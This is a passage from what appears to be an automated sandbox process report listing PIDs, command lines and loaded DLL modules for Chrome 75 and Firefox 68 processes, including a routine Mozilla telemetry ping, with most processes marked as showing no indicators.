c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll

PID
3536
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --lang=en-US --no-sandbox --service-request-channel-token=12226082443557512274 --mojo-platform-channel-handle=1152 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\twext.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\zipfldr.dll
c:\program files\winrar\rarext.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\syncui.dll
c:\windows\system32\synceng.dll
c:\program files\notepad++\nppshell_06.dll
c:\windows\system32\acppage.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\msi.dll
c:\windows\system32\wer.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\netutils.dll

PID
3152
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=9229905927190694119 --mojo-platform-channel-handle=488 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2844
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17043252768994278563 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1256 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3552
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12792008721143679842 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1716 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3840
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe"
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
1016
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe"
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\psapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll
c:\windows\system32\mscms.dll
c:\windows\system32\winsta.dll
c:\program files\mozilla firefox\pingsender.exe
c:\windows\system32\apphelp.dll

PID
2528
CMD
"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/03f06c74-e0e8-46d4-8e41-5553ef3bef80/first-shutdown/Firefox/68.0.1/release/20190717172542?v=4 C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\03f06c74-e0e8-46d4-8e41-5553ef3bef80
Path
C:\Program Files\Mozilla Firefox\pingsender.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Mozilla Foundation
Description
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\pingsender.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\gpapi.dll

PID
3820
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe"
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
No indicators
Parent process
firefox.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2992
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe"
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\psapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wship6.dll
